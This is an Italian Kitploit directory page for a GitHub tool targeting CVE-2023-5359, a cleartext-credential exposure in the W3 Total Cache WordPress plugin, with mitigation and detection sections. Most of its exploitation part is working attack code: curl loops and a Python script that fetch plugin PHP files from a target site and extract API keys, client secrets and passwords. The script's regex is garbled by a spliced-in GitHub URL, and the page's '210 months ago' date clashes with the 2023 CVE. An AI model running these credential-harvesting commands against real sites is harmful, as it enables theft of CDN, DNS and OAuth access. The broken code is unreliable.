Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-5359 — Scanner CVE-2023-5359 per la vulnerabilità di archiviazione in chiaro di W3 Total Cache. Rileva credenziali esposte (chiavi API, token OAuth) in file PHP pubblicamente accessibili. Include script di sfruttamento manuali e automatizzati. | Kitploit
Strumenti/GitHubGitHub/enzocipher/cve-2023-5359
Scanner di VulnerabilitàAttacchi alle PasswordExploitRaccolta InformazioniSicurezza WebApprendimento e Formazione
GitHubenzocipher/cve-2023-5359

CVE-2023-5359

Scanner CVE-2023-5359 per la vulnerabilità di archiviazione in chiaro di W3 Total Cache. Rileva credenziali esposte (chiavi API, token OAuth) in file PHP pubblicamente accessibili. Include script di sfruttamento manuali e automatizzati.

Vedi Repository
210 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-5359 - Vulnerabilità di archiviazione in chiaro di W3 Total Cache

Descrizione

CVE-2023-5359 è una vulnerabilità di archiviazione in chiaro che interessa il plugin WordPress W3 Total Cache nelle versioni ≤ 2.7.5. Questa vulnerabilità consente a utenti malintenzionati remoti di accedere a credenziali sensibili archiviate in file PHP non crittografati e accessibili pubblicamente.

Gravità

  • Punteggio CVSS: 7.5 (Alta)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • Tipo: Esposizione di informazioni sensibili

Vulnerabilità Tecnica

Causa Principale

W3 Total Cache memorizza le impostazioni di configurazione e le credenziali API in file PHP all'interno della directory /wp-content/plugins/w3-total-cache/ senza un'adeguata protezione. Questi file sono accessibili tramite HTTP, esponendo:

  • Chiavi API (CloudFlare, Google, ecc.)
  • Secret del client
  • Token OAuth
  • Credenziali di servizi esterni
  • File Interessati

    root@kitploit:~
    /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
    /wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
    /wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
    /wp-content/plugins/w3-total-cache/Config.php
    /wp-content/plugins/w3-total-cache/Cache_File.php
    

    Sfruttamento

    Metodo Manuale

    root@kitploit:~
    # Verifica se W3 Total Cache è installato
    curl -s https://target.com/ | grep "w3-total-cache"
    
    # Estrai le credenziali CloudFlare
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"
    
    # Cerca in tutti i file vulnerabili
    for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
        echo "=== $file ==="
        curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
    done
    

    Script Automatico

    root@kitploit:~
    #!/usr/bin/env python3
    import requests
    import re
    
    target = "https://victim.com"
    files = [
        "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
        "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
    ]
    
    for file in files:
        response = requests.get(target + file)
        credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/main/%5B%5E%27%5C%22%5D%2B)", response.text)
        if credentials:
            print(f"[!] Credentials found in {file}:")
            for key, value in credentials:
                print(f"    {key}: {value}")
    

    Impatto

    Un utente malintenzionato può ottenere:

    1. Credenziali CloudFlare - Prendere il controllo di CDN e DNS
    2. Chiavi API per servizi esterni - Accedere ad account esterni
    3. Token OAuth - Impersonare l'identità
    4. Configurazioni della cache - Manipolare i contenuti serviti

    Mitigazione

    Soluzione Immediata

    1. Aggiornare a W3 Total Cache ≥ 2.7.6
    2. Limitare l'accesso ai file PHP nella directory dei plugin
    3. Revocare e rigenerare tutte le credenziali esposte

    Configurazione Sicura

    root@kitploit:~
    # Protezione .htaccess
    <Files *.php>
        Deny from all
    </Files>
    <Files "w3-total-cache.php">
        Allow from all
    </Files>
    

    Rilevamento

    Comando di Verifica

    root@kitploit:~
    # Verifica la versione vulnerabile
    curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"
    

    Indicatori di Compromissione

    • Attività insolita nelle API esterne
    • Modifiche nelle configurazioni CloudFlare
    • Traffico da IP non autorizzati verso servizi collegati

    Esempio di Riscontro

    root@kitploit:~
    [*] Scansione: https://example.com
    [+] W3 Total Cache rilevato
    [+] File accessibile: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
    [!] CREDENZIALI TROVATE:
        client_id: GAxxxxxxxxxxxx78
        client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345
    

    Riferimenti

    • CVE-2023-5359
    • Changelog di W3 Total Cache
    • Team di sicurezza di WordPress

    Avviso Legale

    Questo repository è solo per scopi educativi e test di penetrazione autorizzati. L'uso malevolo di queste informazioni è severamente proibito.


    Hai trovato utili queste informazioni? Metti una stella al repository!

    Ultimo aggiornamento: Novembre 2025

    Scarica lo strumento